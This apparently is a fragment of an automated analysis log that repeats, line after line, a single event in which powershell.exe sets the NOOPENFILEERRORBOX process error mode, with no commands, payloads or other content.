    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
